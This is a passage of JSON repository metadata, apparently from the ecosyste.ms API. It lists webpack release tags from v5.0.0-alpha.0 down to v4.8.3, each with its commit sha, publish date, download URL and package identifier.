b_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_ur